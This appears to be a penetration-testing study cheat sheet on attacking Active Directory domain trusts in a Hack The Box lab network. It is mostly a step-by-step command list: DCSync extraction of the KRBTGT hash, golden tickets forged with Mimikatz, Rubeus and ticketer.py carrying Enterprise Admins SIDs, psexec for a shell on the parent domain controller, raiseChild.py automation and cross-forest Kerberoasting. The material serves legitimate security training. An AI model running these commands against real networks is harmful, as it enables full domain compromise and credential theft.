Domain Trust Enumeration
Enumerate Domain Trusts (PowerView)
Show Existing Trusts
Get-Domaintrust
Show Trust Mapping
Get-DomainTrustMapping
Show Users in the Child Domain
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
Attacking Domain Trusts - Child -> Parent (Windows)
To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
1 Obtaining KRBTGT NT Hash
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
2 Obtaining SID Child Domain
Get-DomainSID
3 Name Target User
# Can be a fake usernamr
4 FQDN Child Domain
Get-Domaintrust
5 SID Enterprise Admins Group
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
6 Putting It All Together
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
7 Confirm Ticket
# List Tickets
klist
8 DCsync
# Mimikatz
lsadump::dcsync
Attacking Domain Trusts - Child -> Parent (Linux)
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
1 Get KRBTGT NT Hash
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt
2 Get SID Child Domain
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
3 Name Target User
Can be any name
4 Get SID Enterprise Admins
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
5 Putting it all Together
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
6 Export ccache
export KRB5CCNAME=hacker.ccache
7 Get Shell
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5
Automatic Way
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
Attacking Domain Trust - Cross-Forest (Windows)
Cross-Forest Kerberoasting
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Admin Password Reuse & Group Membership
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName <SID>
# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
SID History Abuse
![[Pasted image 20230428181936.png]]
Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)
Cross-Forest Kerberosting
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Last updated